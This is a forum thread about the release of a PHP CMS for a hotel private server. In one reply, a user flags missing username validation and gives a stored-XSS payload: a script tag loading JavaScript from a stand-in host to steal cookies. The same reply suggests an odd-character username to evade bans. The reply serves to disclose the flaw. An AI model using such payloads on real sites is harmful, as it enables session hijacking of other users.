- Joined
- Apr 30, 2007
- Messages
- 2,339
- Reaction score
- 1,547
Don't use it anymore.
Dev thread: https://forum.ragezone.com/f331/odin-cms-mysqli-raintpl-oop-1063274/
Download:You must be registered to see links
mybee you can share database to ?
I bet there are exploits lol
$first_name = (isset($_POST["username"]) ? $core->Filter($_POST["username"]) : null);
//here it just filters the username, so blabla"blabla will become blabla\"blabla, nothing wrong with that, but you can still pick this name
if(is_null($first_name))
{
$registerErrors[] = "You must enter a username.";
}
//just checks if it's null, nothing wrong with it
$full_name = $first_name;
if(!$users->CheckUsername($full_name))
{
$registerErrors[] = "That username is unavailable.";
}
//Here it checks if there's the same username already, there's no check what characters you can use whatsoever
//you can just fill in <script src="http://whateverwebsite.com/blabla.js"></script> and steal some cookies!
I've looked at the source, looks like you have quite a lot of XSS vulnerabilities
you can also pick a username with the skull altcode, so nobody can ban or target you whatsoever
Code:$first_name = (isset($_POST["username"]) ? $core->Filter($_POST["username"]) : null); //here it just filters the username, so blabla"blabla will become blabla\"blabla, nothing wrong with that, but you can still pick this name if(is_null($first_name)) { $registerErrors[] = "You must enter a username."; } //just checks if it's null, nothing wrong with it $full_name = $first_name; if(!$users->CheckUsername($full_name)) { $registerErrors[] = "That username is unavailable."; } //Here it checks if there's the same username already, there's no check what characters you can use whatsoever //you can just fill in <script src="http://whateverwebsite.com/blabla.js"></script> and steal some cookies!
If I'm wrong, just tell me, but it looks like there's a lot of XSS exploits one can use, this is just one example.
ahh you released it, awesome release man. :8:
I found it funny how people take credits for the css and design etc. When I was the one who originally coded this
noobs will be noobs - aka you
@Jonteh why when i connect to the hk and i login it say incorrect login?
I look hk_fusesMost likely incorrect rank. Check hk_fuses table.